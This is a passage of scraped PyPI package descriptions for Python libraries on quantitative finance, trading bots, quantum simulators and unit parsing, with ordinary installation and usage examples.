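# returned by post_market_order, e.g. '02963299-f1e2-4ca6-b34a-2a89940ed42a'.
def wait_for_order(sdk, order_id, poll_seconds=5):
    # aggregated_status codes from the text: 1 open, 2 closed, 3 failed, 4 partially filled
    while True:
        status = sdk.order_status(order_id)
        if status['aggregated_status'] in (2, 3):   # closed or failed -> finished
            return status
        time.sleep(poll_seconds)                    # still open or partially filled
```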
The client is easy to use and supports fetching data into a Pandas DataFrame for further analysis.Key features:\u2705 Pull data from API directly as a pandas DataFrame\u2705 Automatically cached data for faster retrieval and saved credits\u2705 Integrated OpenAI for querying data using natural language promptsInstallationTo install the Quantsight Data API Python client, usepip:pipinstallquantsightUsageFirst, import theQuantsightDataAPIclass and create an instance with your API key:importquantsightasqsapi_key=\"your_api_key\"qs=qs.Quantsight(api_key)Then, you can use the following methods to fetch data from the Quantsight Data API:Get funding rateTo fetch historical funding rates from a supported exchange, use theget_funding_ratemethod:funding_rate_df=qs.get_funding_rate(exchange=\"okx\",limit=1e6,)Get OHLCV dataTo fetch candle data from a supported exchange, use theget_ohlcvmethod:ohlcv_df=qs.get_ohlcv(period=\"1d\",exchange=\"okx\",limit=1e6,)Get OHLCV data around timeTo fetch candle data around a specific point in time, use theget_ohlcv_around_timemethod:ohlcv_around_time_df=qs.get_ohlcv_around_time(period=\"1d\",exchange=\"okx\",target_time=time(9,0,0),sample_count=10,limit=1e6,)Endpoint is useful for execution optimisation or seasonality analysisCustom query (BETA)To perform a custom query, use thecustom_querymethod:custom_query_df=qs.custom_query(\"SELECT close FROM {{okx.ohlcv.swap.1d}} LIMIT 10\",dry_run=True,use_legacy_sql=False)Each method returns a Pandas DataFrame containing the fetched data.CachingQueries are cached both in BigQuery and on the client side in order to maximise your data allowance.By default the local cache location is stored next to the clien.py file but you may change it when initialising the\nclient:qs=qs.Quantsight(api_key=api_key,cache_path=Path(\"root/your/custom/cache/location\"))You can retrieve cache metadata like so:qs.read_cache_metadata()You can delete all cache like so:qs.clear_cache()Pandas cache is handled by thedata-cachelibrary.DocumentationThe documentation for each endpoints can be found here:https://api.quantsight.dev/docsLicenseThis project is licensed under the MIT License. See theGNU GENERAL PUBLIC LICENSEfile for details."} +{"package": "quantSim", "pacakge-description": "No description available on PyPI."} +{"package": "quants-net", "pacakge-description": "quants-net-pyPython package of quants-net"} +{"package": "quantspace", "pacakge-description": "quantspaceis a Python library designed specifically for quantitative finance, with a primary focus on supporting research and education in the field.Risk ManagementPortfolio OptimizationAnomaly DetectionFeatures1.Quantitative Research Toolsquantspaceoffers a comprehensive set of tools for conducting quantitative research in finance. From statistical analysis to advanced modeling techniques, the library provides the building blocks for developing and testing sophisticated financial strategies.2.Educational ResourcesDesigned with education in mind,quantspaceincludes resources and examples to help users understand and apply quantitative finance concepts. The library serves as a valuable resource for students, providing hands-on experience with real-world financial data and models.3.Data Integrationquantspaceseamlessly integrates with popular financial data sources, allowing users to access and analyze real-time and historical market data. 
This feature enhances the library's capabilities for both research and educational purposes.4.Flexibility and CustomizationThe library is designed to be flexible and customizable, accommodating a wide range of financial modeling requirements. Whether you are developing algorithms for risk management, portfolio optimization, or derivative pricing,quantspaceprovides a robust foundation for implementation.Getting StartedTo get started withquantspace, follow these simple steps:Installation:pip install quantspaceGetting Started:Risk measure:fromquantspace.riskimportsummary_riskreturns=[0.065,0.0265,-0.0593,-0.001,0.0346]summary_risk(returns=returns,risk_free_rate=0.05)Portfolio optimization:fromquantspace.utils.datasetsimportrandom_portfoliofromquantspace.portfolioimportMarkowitzFrontierimportnumpyasnpnp.random.seed(1234)n_assets=5# number of assets in portfolion_obs=1000# number of observations in datareturn_vec=np.random.randn(n_assets,n_obs)# generate random returns for each assetn_portfolios=500# number of portfolios to simulatemeans,stds=np.column_stack([random_portfolio(return_vec)for_inrange(n_portfolios)])# instantiate MarkowitzFrontier classm_frontier=MarkowitzFrontier(return_vec,stds,means)# plot efficient frontierm_frontier.plot_frontier()ContributionsWe welcome contributions from the community to enhance and expandquantspace. If you have ideas for new features, improvements, or find any issues, please feel free to contribute by submitting a pull request or opening an issue on our GitHub repository.Support and CommunityFor support or to connect with other users and contributors, join our community forums. We encourage discussions, knowledge sharing, and collaboration within thequantspacecommunity.Licensequantspaceis released under theMIT License, making it open and accessible for a wide range of users.Disclaimerquantspaceis provided \"as is\" without any warranty, express or implied. Use it at your own risk, and carefully review and test any code before deploying it in a production environment.Happy quantifying withquantspace!"} +{"package": "quantstack", "pacakge-description": "UNKNOWN"} +{"package": "quantstats-lumi", "pacakge-description": "Fork of Original QuantStats by Ran AroussiThis is a forked version of the original QuantStats library by Ran Aroussi. The original library can be found athttps://github.com/ranaroussi/quantstatsThis forked version was created because it seems that the original library is no longer being maintained. The original library has a number of issues and pull requests that have been open for a long time and have not been addressed. This forked version aims to address some of these issues and pull requests.This forked version is created and maintained by the Lumiwealth team. We are a team of data scientists and software engineers who are passionate about quantitative finance and algorithmic trading. 
We use QuantStats in our daily work with the Lumibot library and we want to make sure that QuantStats is a reliable and well-maintained library.If you\u2019re interested in learning how to make your own trading algorithms, check out our Lumibot library athttps://github.com/Lumiwealth/lumibotand check out our courses athttps://lumiwealth.comQuantStats: Portfolio analytics for quantsQuantStatsPython library that performs portfolio profiling, allowing quants and portfolio managers to understand their performance better by providing them with in-depth analytics and risk metrics.Changelog \u00bbQuantStats is comprised of 3 main modules:quantstats.stats- for calculating various performance metrics, like Sharpe ratio, Win rate, Volatility, etc.quantstats.plots- for visualizing performance, drawdowns, rolling statistics, monthly returns, etc.quantstats.reports- for generating metrics reports, batch plotting, and creating tear sheets that can be saved as an HTML file.Here\u2019s an example of a simple tear sheet analyzing a strategy:Quick StartInstall QuantStats Lumi using pip:$pipinstallquantstats-lumi%matplotlibinlineimportquantstats_lumiasqs# extend pandas functionality with metrics, etc.qs.extend_pandas()# fetch the daily returns for a stockstock=qs.utils.download_returns('META')# show sharpe ratioqs.stats.sharpe(stock)# or using extend_pandas() :)stock.sharpe()Output:0.8135304438803402Visualize stock performanceqs.plots.snapshot(stock,title='Facebook Performance',show=True)# can also be called via:# stock.plot_snapshot(title='Facebook Performance', show=True)Output:Creating a reportYou can create 7 different report tearsheets:qs.reports.metrics(mode='basic|full\",...)- shows basic/full metricsqs.reports.plots(mode='basic|full\",...)- shows basic/full plotsqs.reports.basic(...)- shows basic metrics and plotsqs.reports.full(...)- shows full metrics and plotsqs.reports.html(...)- generates a complete report as htmlLet\u2019 create an html tearsheet(benchmarkcanbeapandasSeriesorticker)qs.reports.html(stock,\"SPY\")Output will generate something like this:(view original html file)To view a complete list of available methods, run[fforfindir(qs.stats)iff[0]!='_']['avg_loss',\n 'avg_return',\n 'avg_win',\n 'best',\n 'cagr',\n 'calmar',\n 'common_sense_ratio',\n 'comp',\n 'compare',\n 'compsum',\n 'conditional_value_at_risk',\n 'consecutive_losses',\n 'consecutive_wins',\n 'cpc_index',\n 'cvar',\n 'drawdown_details',\n 'expected_return',\n 'expected_shortfall',\n 'exposure',\n 'gain_to_pain_ratio',\n 'geometric_mean',\n 'ghpr',\n 'greeks',\n 'implied_volatility',\n 'information_ratio',\n 'kelly_criterion',\n 'kurtosis',\n 'max_drawdown',\n 'monthly_returns',\n 'outlier_loss_ratio',\n 'outlier_win_ratio',\n 'outliers',\n 'payoff_ratio',\n 'profit_factor',\n 'profit_ratio',\n 'r2',\n 'r_squared',\n 'rar',\n 'recovery_factor',\n 'remove_outliers',\n 'risk_of_ruin',\n 'risk_return_ratio',\n 'rolling_greeks',\n 'ror',\n 'sharpe',\n 'skew',\n 'sortino',\n 'adjusted_sortino',\n 'tail_ratio',\n 'to_drawdown_series',\n 'ulcer_index',\n 'ulcer_performance_index',\n 'upi',\n 'utils',\n 'value_at_risk',\n 'var',\n 'volatility',\n 'win_loss_ratio',\n 'win_rate',\n 'worst'][fforfindir(qs.plots)iff[0]!='_']['daily_returns',\n 'distribution',\n 'drawdown',\n 'drawdowns_periods',\n 'earnings',\n 'histogram',\n 'log_returns',\n 'monthly_heatmap',\n 'returns',\n 'rolling_beta',\n 'rolling_sharpe',\n 'rolling_sortino',\n 'rolling_volatility',\n 'snapshot',\n 'yearly_returns']*** Full documenttion coming soon ***In the 
meantime, you can get insights as to optional parameters for each method, by using Python\u2019shelpmethod:help(qs.stats.conditional_value_at_risk)Help on function conditional_value_at_risk in module quantstats.stats:\n\nconditional_value_at_risk(returns, sigma=1, confidence=0.99)\n calculats the conditional daily value-at-risk (aka expected shortfall)\n quantifies the amount of tail risk an investmentInstallationInstall usingpip:$pipinstallquantstats--upgrade--no-cache-dirInstall usingconda:$condainstall-cranaroussiquantstatsRequirementsPython>= 3.5+pandas(tested to work with >=0.24.0)numpy>= 1.15.0scipy>= 1.2.0matplotlib>= 3.0.0seaborn>= 0.9.0tabulate>= 0.8.0yfinance>= 0.1.38plotly>= 3.4.1 (optional, for usingplots.to_plotly())Questions?This is a new library\u2026 If you find a bug, pleaseopen an issuein this repository.If you\u2019d like to contribute, a great place to look is theissues marked with help-wanted.Known IssuesFor some reason, I couldn\u2019t find a way to tell seaborn not to return the\nmonthly returns heatmap when instructed to save - so even if you save the plot (by passingsavefig={...}) it will still show the plot.Legal StuffQuantStatsis distributed under theApache Software License. See theLICENSE.txtfile in the release for details.P.S.Please drop me a note with any feedback you have.Ran Aroussi"} +{"package": "quantstyles", "pacakge-description": "QuantstylesA set of slightly customized colormaps and styles, developed for internal use by Quantum Technology research group in the University of Rostock.It includes the set of colormaps + custom matplotlib style.UsageImport the package in your scriptimport quantstylesPackage automatically exports all the colormaps, i.e. they could be normally used by their names, e.g.plt.show(data, cmap=\"quantjet\")Custom matplotlib style will be registered during first import of the package. It can be then activated asplt.style.use(\"quant\")InstallationThe package is published on pypi, so it is enough to run:pip install quantstylesManual installation# clone the repogitclonehttps://github.com/Trel725/quantstyles.git--recursive# build the wheelmake# manually install the built packagepipinstalldist/quantstyles-*-py3-none-any.whlAcknoledgementsThis project depends onBeautiful package for generating perceptually uniform colormapsby Peter Kovesi. The heart of this small project is just a small modification of original Julia code.get-cpt script that allows efficient export of generated colormaps to Python.DevelopmentIf you'd like to manually go through all the steps:Clone the repo bygit clone https://github.com/Trel725/quantstyles.git --recursiveRecursive is needed to sync get-cpt repo.Generate colormaps by executing Julia code in colormaps foldercd colormaps\njulia colormaps.jlPerceptualColourMaps.jl and PyPlot.jl need to be installed. See that code for more details, or just use pre-generated colormaps in the colormaps directory.3. Generate Python representation of the colormaps by runningpython generate_quantcmaps.py. This will produce actual file containing colormaps, quantcmaps.py The command requires numpy, os, glob and (probably) urllib (from get-cpt).\n4. Import quantcmaps in your script. All the listed colormaps will be available as usual, e.g.plt.imshow(data, cmap=\"quantjet\")5. Custom style need to be copied to the matplotlib config dir. Seeofficial manualsfor details.6. 
Additionally you can try to build a pip wheel by executing make in the project top directory. 0.01 Initial release, includes Colormaps generation, Packaging. 0.100 Published on PyPI. 0.101-0.103 Bug fixes. 0.104 Added custom MPL style and its installer. 0.105 Switched to sans-serif fonts according to Nature recommendations; corrected font size for the same reason. 0.106-0.107 Bug fixes"}
{"package": "quant-survey", "pacakge-description": "No description available on PyPI."}
{"package": "quanttide-data", "pacakge-description": "quanttide-data-python: QuantTide Data Engineering, Python edition. Installation: install via pip with pip install quanttide-data, or via poetry with poetry add quanttide-data. Testing: poetry install"}
{"package": "quanttide-devops", "pacakge-description": "quanttide-devops-pythonPython SDK for Specification of QuantTide DevOpsInstallationpipinstallquanttide-devopsUsageqtdevopsreposync"}
{"package": "quanttools", "pacakge-description": "QuantTools Fundamental package for Quantitative Finance in Python."}
{"package": "quant-trade-framework", "pacakge-description": "General: QuantTradeClient, a general-purpose quantitative trading framework client that lets users fetch platform data.#20191129 Created the initial version#20191130 Added the bar-data retrieval interface\n(1) Initialize the database connection configuration; the standard configuration below can be used directly from the source code, and the configuration file lives in the conf directory\ndatabase_manager = initialize.init(setting.SETTINGS)\n(2) database_manager.load_bar_data retrieves bar data and takes five parameters\nsymbol: str, the contract name, e.g. "M9999.XDCE"\nexchange: str, the exchange, "test" by default\ninterval: str, the bar aggregation interval, currently only "1m"\nstart: datetime, the query start time, in a format like "2019-11-07 09:00:00"\nend: datetime, the query end time, in a format like "2019-11-07 09:00:00"\nThe data interface returns a pandas DataFrame object. 0.1.2\nImproved the program code and added code comments\nHow to use sphinx:\n(1) Auto-generate rst from the Python source code with the command:\nsphinx-apidoc.exe -o rst ..sphinx-apidoc -o [location for the generated rst] [location of the project code] -f (force overwrite; otherwise existing files with the same name are detected and skipped without updating)\nsphinx-apidoc -o rst ../src"}
{"package": "quanttrader", "pacakge-description": "quanttraderWelcome to quanttrader, a pure python-based event-driven backtest and live trading package for quant traders.The source code is completely open-sourcedhere on GitHub. The package is publishedhere on pypiand is ready to be pip installed. The document is hostedhere on readthedocs.In most cases, a backtest strategy can be directly used for live trade by simply switching to live brokerage. 
A control window is provided to monitor live trading sessions for each strategy separately and the portfolio as a whole.BacktestBacktest code structureBacktests examplesLive tradingLive Trading demo videoLive Trading code structurePrerequisite: download and install IB TWS or IB Gateway; enable API connection as describedhere.InstallationStep 1pipinstallquanttraderAlternatively, download or git the source code and include unzipped path in PYTHONPATH environment variable.step 2Downloadlive_engine.py,config_live.yaml,order_per_interval_strategy.pyby clicking Raw button, right clicking save as, and then change the file extension to .py or .yaml.step 3cdwhere_the_files_are_saved\npythonlive_engine.pyInstruments Supported and ExampleStock: AMZN STK SMARTForeign Exchange: EURGBP CASH IDEALPROFutures: ESM9 FUT GLOBEXOptions on Stock: AAPL OPT 20201016 128.75 C SMARTOptions on Futures: ES FOP 20200911 3450 C 50 GLOBEXComdty: XAUUSD CMDTY SMARTOrder Type SupportedBasic order types. SeeIB Docfor details.AuctionAuction LimitMarketMarket If TouchedMarket On CloseMarket On OpenMarket to LimitLimit OrderLimit if TouchedLimit on CloseLimit on OpenStopStop LimitTrailing StopTrailing Stop LimitDISCLAIMEROpen source, free to use, free to contribute, use at own risk. No promise of future profits nor responsibility of future loses."} +{"package": "quant-trading-api", "pacakge-description": "Python library for connecting to the Quant-trading.Network API."} +{"package": "quant-trading-bitmex-market-maker", "pacakge-description": "Quant-trading.network BitMEX Market MakerThis is a fully working sample market making bot for use withBitMEX.It is free to use and modify for your own development.Test onTestnetfirst!Testnet trading is completely free and is identical to the live market.Getting StartedCreate aQuant-trading.network Accountand checkout an algorihtm subscription.Create aTestnet BitMEX Accountanddeposit some TBTC.Install:pip install quant-trading-bitmex-market-maker. It is strongly recommeded to use a virtualenv.Create a marketmaker project: runmarketmaker setupThis will createsettings.pyandmarket_maker/in the working directory.Modifysettings.pyto configure the parameters.Edit settings.py to add yourBitMEX API Key and Secretand yourQuant-trading.network API Key, chose the quant-trading algorigthm to use and change bot parameters to fit your risk profile.Note that user/password authentication is not supported.Run it:marketmakerSatisfied with your bot's performance? Create alive API Keyfor your BitMEX account,clear the bot internal stateand then set theBASE_URLand start trading!Configure your bot (settings.py)A brief explanation of parameters that you will have to configure before using this bot. You can find these parameters in the settings filesettings.py.BASE_URL- The URL of the BitMEX exchange api (either the testnet one or the live market).BITMEX_API_KEY- The BitMEX API key associated with your account (make sure that this key will have the right permissions to place trading orders).BITMEX_API_SECRET- The BitMEX API key secret associated with your account.QUANT_API_KEY- The quant-trading.network API key associated with your account.QUANT_ALGO- The quant-trading.network algorithm you want to use (make sure that you have an active subscription for the chosen algorithm).TRADING_BALANCE_SIZE- The maximum trading position size in terms of percentage of your BitMEX account margin balance. 
The bigger the trading position the bigger will the rewards be, but also the risk of getting your BitMEX account liquidated. Therefore we have capped this parameter with reasonable limits for safety. This setting has the following limitsMin=10% & Max=100%.WarningPlease make sure to not use the associated BitMEX account other than by this bot. When you start trading with this bot make sure that you do not have any open position on BitMEX, otherwise, this may lead to unpredictable consequences including your BitMEX account liquidation!!!Clearing the bot internal stateThis is an action that you will have to take every time when you need to change some of the bot parameters as well as one of thetroubleshooting measure. When you execute this bot it will create two important filesopen_longs.py&open_shorts.pywhere it will save its internal state periodically so that it can recover its state after a restart. Therefore if you have to change certain bot parameters such asBASE_URL,QUANT_ALGOandTRADING_BALANCE_SIZE, this change will invalidate the current state saved in these files and hence you will have to execute the actions below:Close the market maker bot.Make sure that you close any open position that may have in your BitMEX account before starting the market maker bot.If the filesopen_longs.py&open_shorts.pyexist in the bot working directory delete them.If you need to change your bot configuration go over the filesettings.pyand make the necessary changes.Now you can start up the bot and make sure that it startscorrectly.Operation OverviewThis market maker works on the following principles:The market maker bot during its execution will create two important filesopen_longs.py&open_shorts.pywhere it will save its internal state periodically so that it can recover its state after a restart.The market maker tracks the lastbidPriceandaskPriceof the quoted instrument to determine where to start quoting.Based on quant-trading algorithm parameters, the bot creates a descriptions of orders it would like to place.This will be done when the bot gets the quant-trading algorithm real-time decision for the given current position in BitMEX.That personalized decision will either wait or it will increase\\decrease the current long or short position.\nBy repeating this process the quant-trading algorithm will totally manage your current position in BitMEX over time without any human intervention.These order descriptors are compared with what the bot has currently placed in the market.If an existing order can be amended to the desired value, it is amended.Otherwise, a new order is created.Extra orders are canceled.The bot then prints details of contracts traded, current balance, and current position size in percentage of the balance and in contracts amount.Simplified OutputThe following is some of what you can expect when running this bot:2020-07-10 08:41:49,680 - INFO - market_maker_runner - BitMEX Quant-trading.Network Market Maker Version: v1.0\n\n2020-07-10 08:41:51,253 - INFO - ws_thread - Connecting to wss://testnet.bitmex.com/realtime?subscribe=quote:XBTUSD,trade:XBTUSD,instrument,order:XBTUSD,execution:XBTUSD,margin,position\n2020-07-10 08:41:51,254 - INFO - ws_thread - Authenticating with API Key.\n2020-07-10 08:41:51,255 - INFO - ws_thread - Started thread\n2020-07-10 08:41:52,255 - INFO - ws_thread - Connected to WS. Waiting for data images, this may take a moment...\n2020-07-10 08:41:53,066 - INFO - ws_thread - Got all market data. 
Starting.\n2020-07-10 08:41:53,066 - INFO - market_maker - Using symbol XBTUSD.\n2020-07-10 08:41:53,066 - INFO - market_maker - Order Manager initializing, connecting to BitMEX. Live run: executing real trades.\n2020-07-10 08:41:53,067 - INFO - market_maker - Resetting current position. Canceling all existing orders.\n2020-07-10 08:41:53,067 - INFO - bitmex - sending req to https://testnet.bitmex.com/api/v1/order: {\"filter\": \"{\\\"ordStatus.isTerminated\\\": false, \\\"symbol\\\": \\\"XBTUSD\\\"}\", \"count\": 500}\n2020-07-10 08:41:54,323 - INFO - quant_base_strategy - print_status - Current XBT Balance: 0.962841\n2020-07-10 08:41:54,323 - INFO - quant_base_strategy - print_status - Current Contract Position: 0\n2020-07-10 08:41:54,323 - INFO - quant_base_strategy - print_status - Current Internal Position Percentage Size: 0.00\n2020-07-10 08:41:54,324 - INFO - quant_base_strategy - print_status - Current Internal Contract Position: 0\n2020-07-10 08:42:02,592 - INFO - quant_base_strategy - print_status - Current XBT Balance: 0.962841\n2020-07-10 08:42:02,593 - INFO - quant_base_strategy - print_status - Current Contract Position: 0\n2020-07-10 08:42:02,593 - INFO - quant_base_strategy - print_status - Current Internal Position Percentage Size: 0.00\n2020-07-10 08:42:02,593 - INFO - quant_base_strategy - print_status - Current Internal Contract Position: 0\n2020-07-10 08:42:02,593 - INFO - quant_base_strategy - handle_new_decision - new decision OPEN_LONG.\n2020-07-10 08:42:02,594 - INFO - market_maker - Creating 1 orders:\n2020-07-10 08:42:02,594 - INFO - market_maker - Buy 882 @ 9163.0\n2020-07-10 08:42:02,594 - INFO - bitmex - sending req to https://testnet.bitmex.com/api/v1/order/bulk: {\"orders\": [{\"price\": 9163.0, \"orderQty\": 882, \"side\": \"Buy\", \"clOrdID\": \"mm_bitmex_*REDACTED*\", \"symbol\": \"XBTUSD\", \"execInst\": \"ParticipateDoNotInitiate\"}]}\n2020-07-10 08:43:52,048 - INFO - ws_thread - Execution: Buy 725 Contracts of XBTUSD at 9163.0\n2020-07-10 08:44:02,583 - INFO - ws_thread - Execution: Buy 157 Contracts of XBTUSD at 9163.0\n2020-07-10 08:44:02,713 - INFO - quant_base_strategy - check_new_trade - We have a completed trade. 
Order details: {'orderID': '*REDACTED*', 'clOrdID': 'mm_bitmex_*REDACTED*', 'clOrdLinkID': '', 'account': 119731, 'symbol': 'XBTUSD', 'side': 'Buy', 'simpleOrderQty': None, 'orderQty': 882, 'price': 9163, 'displayQty': None, 'stopPx': None, 'pegOffsetValue': None, 'pegPriceType': '', 'currency': 'USD', 'settlCurrency': 'XBt', 'ordType': 'Limit', 'timeInForce': 'GoodTillCancel', 'execInst': 'ParticipateDoNotInitiate', 'contingencyType': '', 'exDestination': 'XBME', 'ordStatus': 'Filled', 'triggered': '', 'workingIndicator': False, 'ordRejReason': '', 'simpleLeavesQty': None, 'leavesQty': 0, 'simpleCumQty': None, 'cumQty': 882, 'avgPx': 9163.5, 'multiLegReportingType': 'SingleSecurity', 'text': 'Submitted via API.', 'transactTime': '2020-07-10T07:42:02.660Z', 'timestamp': '2020-07-10T07:44:02.524Z'}\n2020-07-10 08:58:46,989 - INFO - quant_base_strategy - print_status - Current XBT Balance: 0.962433\n2020-07-10 08:58:46,990 - INFO - quant_base_strategy - print_status - Current Contract Position: 882\n2020-07-10 08:58:46,990 - INFO - quant_base_strategy - print_status - Avg Cost Price: 9163.5\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Avg Entry Price: 9163.5\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Current Internal Position Percentage Size: 10.00\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Current Internal Contract Position: 882\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - handle_new_decision - new decision NONE.TroubleshootingThis bot during its execution life cycle it will try to keep its internal representation of the current position and the real current position in sync. This is really important so keep an eye on this. Because the algorithms' decisions are based on this internal representation. So during the bot execution, it will periodically print its status just like below:2020-07-10 08:58:46,989 - INFO - quant_base_strategy - print_status - Current XBT Balance: 0.962433\n2020-07-10 08:58:46,990 - INFO - quant_base_strategy - print_status - Current Contract Position: 882\n2020-07-10 08:58:46,990 - INFO - quant_base_strategy - print_status - Avg Cost Price: 9163.5\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Avg Entry Price: 9163.5\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Current Internal Position Percentage Size: 10.00\n2020-07-10 08:58:46,991 - INFO - quant_base_strategy - print_status - Current Internal Contract Position: 882Current Contract Positionshould have the exact same value asCurrent Internal Contract Position. If this is not the case then you will have to close the bot, close your current position in your BitMEX account, and thenclear the bot internal state.Common errors we've seen:TypeError: __init__() got an unexpected keyword argument 'json'This is caused by an outdated version ofrequests. Runpip install -U requeststo update.CompatibilityThis module supports Python 3.5 and later.See alsoQuant-trading.network has a PythonREST clientAuthorsupport@quant-trading.network"} +{"package": "quanttus_api", "pacakge-description": "UNKNOWN"} +{"package": "quantuaninvest-download", "pacakge-description": "No description available on PyPI."} +{"package": "quantuiti", "pacakge-description": "quantuitiquantuiti is a platform designed to make automated trading easier.(Read the docs)"} +{"package": "quantuloop-aws-client", "pacakge-description": "Quantuloop AWS ClientClient to access your quantum simulator server on AWS. 
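As the next paragraph explains, the two contract-position figures in this printout should always agree. A small, hypothetical helper (not part of the market-maker package) that scans a saved copy of the bot's log for the most recent values and checks them against each other might look like this:

```python
import re

# Hypothetical helper, not part of the bot: compares the latest
# 'Current Contract Position' and 'Current Internal Contract Position'
# values printed by print_status in a saved log file.
PATTERN = re.compile(r"Current (Internal )?Contract Position: (-?\d+)")

def positions_in_sync(log_path):
    exchange_pos = internal_pos = None
    with open(log_path) as log_file:
        for line in log_file:
            match = PATTERN.search(line)
            if match:
                if match.group(1):              # the "Internal" variant
                    internal_pos = int(match.group(2))
                else:
                    exchange_pos = int(match.group(2))
    return exchange_pos == internal_pos
```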
For more information, visithttps://simulator.quantuloop.com."} +{"package": "quantuloop-quest", "pacakge-description": "QuEST interface for the Ket Quantum Programming LanguageThis package provides the Quantuloop interface for QuEST, a open-source GPU accelerated quantum simulator, as a quantum execution target for the quantum programming language Ket. For more information on Ket, please visithttps://quantumket.org.Please note that the use of this simulator is exclusively for Quantuloop's customers and partners. To obtain your access token, please contact your institution or visithttps://quantuloop.com.CompatibilityThe following system requirements are necessary to run the Quantuloop QuEST simulator:CUDA 11.2 or newer with compatible NVIDIA driverNVIDIA GPU with CUDA architecture >= 3.5Linux X86_64 with glibc >= 2.17Ubuntu 18.04 or newer.Red Hat Enterprise Linux 7 or newer.Python 3.7 or newerKet 0.5.xUsageTo use Quantuloop QuEST, importquantuloop_questand set it as the quantum target execution:fromketimport*fromquantuloop_questquantuloop_quest.set_simulator(token='YOUR,ACCESS.TOKEN',)By installing or using this package, you agree to the Quantuloop Quantum Simulator Suite EULA.All rights reserved (C) 2023 Quantuloop"} +{"package": "quantuloop-simulator", "pacakge-description": "Quantuloop Quantum Simulator Suite for HPCTheQuantuloop Quantum Simulator Suite for HPCis a collection of high-performance quantum computer simulators for theKet language. Since quantum algorithms explore distinct aspects of quantum computation to extract advantages, there is no silver bullet for the simulation of a quantum computer. The Quantuloop Quantum Simulator Suite for HPC offers three quantum simulators today, with new ones coming in the future. The simulators available today are:Quantuloop Sparse, which brings the Bitwise Representation (implemented in the KBW Sparse) for HPC. This is the only simulator that implements this simulation algorithm and it provides many benefits:Ready for multi-GPU systems, allowing you to scale up simulations as needed.Efficient execution time with the amount of superposition, providing faster simulations.Exact simulation of more than 100 qubitsdepending on the algorithm, making it ideal for larger simulations.Quantuloop Denseis a state vector simulator built with the NVIDIA cuQuantum SDK cuStateVec. It provides several advantages:Great scalability in multi-GPU systems, enabling large simulations to be run with ease.The perfect fit for most quantum algorithms, allowing you to simulate many different types of quantum circuits.By using the Quantuloop Quantum Simulator Suite for HPC, you can enjoy the following benefits:Faster simulation times, as the simulators are optimized for GPU-based computing.Higher scalability, as multi-GPU systems, can be used to run large simulations.Access to unique simulation algorithms, such as the Parallel Bitwise implemented in the Quantuloop Sparse simulator.Ability to simulate a wide range of quantum algorithms and circuits, allowing you to explore the potential of quantum computing.The use of this simulator is exclusively for Quantuloop's customers and partners. 
Contact your institution to get your access token or visithttps://quantuloop.com.InstallationInstalling using pip:pipinstall--index-urlhttps://gitlab.com/api/v4/projects/43029789/packages/pypi/simplequantuloop-simulatorAdd in poetry:poetrysourceaddquantuloophttps://gitlab.com/api/v4/projects/43029789/packages/pypi/simple--secondary\npoetryaddquantuloop-simulatorUsageimportquantuloop_simulatorasqlimportketql.set_token(token=\"YOR.ACCESS.TOKEN\",# Quantuloop Access Token is required to use the simulators)process=ket.Process(ql.get_simulator(num_qubits=182,simulator=\"sparse\",# or \"dense\"precision=2,# optional, default 1gpu_count=4,# optional, default use all GPUs))CompatibilityThe following system requirements are necessary to run the Quantuloop Dense simulator:CUDA 12 or newer with compatible NVIDIA driverLinux x86_64 with glibc 2.18 or newerUbuntu 20.04 or newer.Red Hat Enterprise Linux 8 or newer.Python 3.8 or newerKet 0.7 or newerQuantuloop Dense is compatible only with CUDA architecture 70, 75, 80, and 86.By installing or using this package, you agree to the Quantuloop Quantum Simulator Suite EULA.All rights reserved (C) 2023 Quantuloop"} +{"package": "quantuloop-sparse", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quantulum", "pacakge-description": "quantulumPython library for information extraction of quantities, measurements and their units from unstructured text.DemoTry ithere.InstallationFirst, installsklearn. Quantulum would still work without it, but it wouldn\u2019t be able to disambiguate between units with the same name (e.g.poundas currency or as unit of mass).Then,$pipinstallquantulumUsage>>>fromquantulumimportparser>>>quants=parser.parse('I want 2 liters of wine')>>>quants[Quantity(2,'litre')]TheQuantityclass stores the surface of the original text it was extracted from, as well as the (start, end) positions of the match:>>>quants[0].surfaceu'2 liters'>>>quants[0].span(7,15)An inline parser that embeds the parsed quantities in the text is also available (especially useful for debugging):>>>printparser.inline_parse('I want 2 liters of wine')Iwant2liters{Quantity(2,\"litre\")}ofwineUnits and entitiesAll units (e.g.litre) and the entities they are associated to (e.g.volume) are reconciled against WikiPedia:>>>quants[0].unitUnit(name=\"litre\",entity=Entity(\"volume\"),uri=https://en.wikipedia.org/wiki/Litre)>>>quants[0].unit.entityEntity(name=\"volume\",uri=https://en.wikipedia.org/wiki/Volume)This library includes more than 290 units and 75 entities. It also parses spelled-out numbers, ranges and uncertainties:>>>parser.parse('I want a gallon of beer')[Quantity(1,'gallon')]>>>parser.parse('The LHC smashes proton beams at 12.8\u201313.0 TeV')[Quantity(12.8,\"teraelectronvolt\"),Quantity(13,\"teraelectronvolt\")]>>>quant=parser.parse('The LHC smashes proton beams at 12.9\u00b10.1 TeV')>>>quant[0].uncertainty0.1Non-standard units usually don\u2019t have a WikiPedia page. 
The parser will still try to guess their underlying entity based on their dimensionality:>>>parser.parse('Sound travels at 0.34 km/s')[0].unitUnit(name=\"kilometre per second\",entity=Entity(\"speed\"),uri=None)DisambiguationIf the parser detects an ambiguity, a classifier based on the WikiPedia pages of the ambiguous units or entities tries to guess the right one:>>>parser.parse('I spent 20 pounds on this!')[Quantity(20,\"pound sterling\")]>>>parser.parse('It weighs no more than 20 pounds')[Quantity(20,\"pound-mass\")]or:>>>text='The average density of the Earth is about 5.5x10-3 kg/cm\u00b3'>>>parser.parse(text)[0].unit.entityEntity(name=\"density\",uri=https://en.wikipedia.org/wiki/Density)>>>text='The amount of O\u2082 is 2.98e-4 kg per liter of atmosphere'>>>parser.parse(text)[0].unit.entityEntity(name=\"concentration\",uri=https://en.wikipedia.org/wiki/Concentration)ManipulationWhile quantities cannot be manipulated within this library, there are many great options out there:pintnatuquantitiesExtensionSeeunits.jsonfor the complete list of units andentities.jsonfor the complete list of entities. The criteria for adding units have been:the unit has (or is redirected to) a WikiPedia pagethe unit is in common use 